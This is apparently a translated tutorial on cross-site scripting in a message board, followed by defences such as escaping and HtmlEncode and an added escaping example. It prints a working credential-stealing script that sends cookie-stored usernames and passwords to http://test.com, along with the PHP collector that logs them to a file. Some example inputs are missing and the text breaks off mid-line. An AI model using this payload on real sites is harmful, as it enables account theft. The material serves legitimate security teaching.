The AddElement() method is used to add a new message, while the RenderComments() method is used to show the message list; the web page looks like this:
Because we fully trust the user input, a user with ulterior motives can enter something like this:
So no matter who accesses this page, the console will output "Hey you is a fool fish!". If this were just a malicious little joke it would be harmless enough, but not everyone's intentions are so cute: some users will use this vulnerability to steal user information, trick people into opening malicious websites or downloading malicious programs, and so on. Let's look at the simplest example.
Using XSS to steal user names and passwords
Of course, this example is kept simple; it would hardly work against a real website and is only meant to show how the attack works. We know that many login pages offer to remember the user name and password so that the next login is easier, and some sites simply store the user name and password in the cookie in clear text. A malicious user registers an account, logs in, and uses a simple tool to look at the cookie structure and names; if the site has an XSS vulnerability, it is then easy to use JSONP to obtain other users' user names and passwords.
A malicious user would enter this:
Let's see what is hidden in http://test.com/hack.js:
// CookieHelper is the page's own cookie helper; it reads a cookie by name.
var username = CookieHelper.getCookie('username').value;
var password = CookieHelper.getCookie('password').value;
// Inject a script tag so the browser issues a GET request (JSONP style)
// that carries the cookie values in the query string.
var script = document.createElement('script');
script.src = 'http://test.com/index.php?username=' + username + '&password=' + password;
document.body.appendChild(script);
A few lines of JavaScript read the user name and password from the cookie and use JSONP to send a GET request to http://test.com/index.php.
The contents of http://test.com/index.php:
<?php
if (!empty($_GET['password'])) {
    $username = $_GET['username'];
    $password = $_GET['password'];
    try {
        // Append the received pair to a text file under the web root.
        $path = $_SERVER['DOCUMENT_ROOT'] . '/password.txt';
        $fp = fopen($path, 'a');
        flock($fp, LOCK_EX);
        fwrite($fp, "$username\t$password\r\n");
        flock($fp, LOCK_UN);
        fclose($fp);
    } catch (Exception $e) {
    }
}
?>
In this way a malicious user can steal information from every user who visits the message board.
How to prevent it
The demo above is a very simple XSS attack; there are many more hidden ways of carrying one out, but the core is always script injection, so the solution is simple: do not trust user input, and escape special characters such as "<" and ">". That prevents the problem at its root. Of course, many frameworks have their own XSS protections; for example, in the ASP.NET practice above, Microsoft's ValidateRequest automatically checks form submissions for XSS. But it is impossible to rule everything out; there will always be some clever malicious user who comes to sabotage our site. If you are not at ease about your own site, you can use an XSS cross-site test code collection to check whether the site is safe.
When the system needs to pop up a message, it simply redirects the user to ShowMessage.ashx?msg=<message>, like this:
Response.Redirect("ShowMessage.ashx?msg=User name cannot be empty!");
We can inspect the request data: if the request data contains "<", it is treated as a malicious request and the submission is refused. ASPX adopts this strategy by default. Its disadvantage is that if you are building a programmers' forum, programmers will not be able to post HTML code, so a better strategy is to display the content the user posted as-is, as text rather than as HTML. HttpUtility.HtmlEncode converts special characters such as "<" and ">" in a string into HTML display characters; that is, "<script>" is no longer treated as a tag that defines a script but as the literal text "<script>", which is then displayed directly on the page as content.
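The escaping approach described above, as an added example that is not part of the original page: an HtmlEncode-style function in JavaScript, used to render the message list safely, shown beside the trusting version from the demo. The function names, the HTML_ESCAPES table and the sample comments are constructed for this illustration; only the "Hey you is a fool fish!" string comes from the page. The coarse "reject anything containing <" check is included only to contrast with escaping, since the text notes it also blocks legitimate posts.

```javascript
// Added example (not the page's own code): escape user input before
// rendering it, the fix the text recommends (HttpUtility.HtmlEncode style).

// Characters that are special in HTML text and attribute contexts.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Convert every HTML-special character so the browser shows it literally
// instead of parsing it as markup. '&' is escaped too, otherwise an
// attacker could smuggle in entities that decode back to '<'.
function htmlEncode(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Trusting rendering, as in the demo: user text is concatenated as markup,
// so a comment containing <script> becomes a real script element.
function renderCommentsUnsafe(comments) {
  return comments.map((c) => '<li>' + c + '</li>').join('');
}

// Hardened rendering: same output shape, but user content is escaped first,
// so "<script>" is displayed as text rather than executed.
function renderCommentsSafe(comments) {
  return comments.map((c) => '<li>' + htmlEncode(c) + '</li>').join('');
}

// Request-level filter mentioned in the text: treat any submission that
// contains an angle bracket as malicious. Simple, but it also rejects
// legitimate posts that merely discuss HTML.
function containsAngleBracket(input) {
  return /[<>]/.test(String(input));
}

// Constructed sample input: a normal message plus one carrying a script tag.
const SAMPLE_COMMENTS = [
  'Hello, nice board!',
  '<script>console.log("Hey you is a fool fish!")</script>',
];

// Stand-alone demonstration: the unsafe output still contains a live
// <script> tag, the safe output does not.
console.log('unsafe:', renderCommentsUnsafe(SAMPLE_COMMENTS));
console.log('safe:  ', renderCommentsSafe(SAMPLE_COMMENTS));
console.log('filter rejects comment 2:', containsAngleBracket(SAMPLE_COMMENTS[1]));
```

Note that escaping is applied at output time, in the HTML text context. Input stored as-is can still be shown correctly in a forum that wants to display code, whereas the angle-bracket filter discards such posts at submission.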
Modify the view-post code: context.Response.Write(line + "
XSS vulnerability for cross-site scripting attacks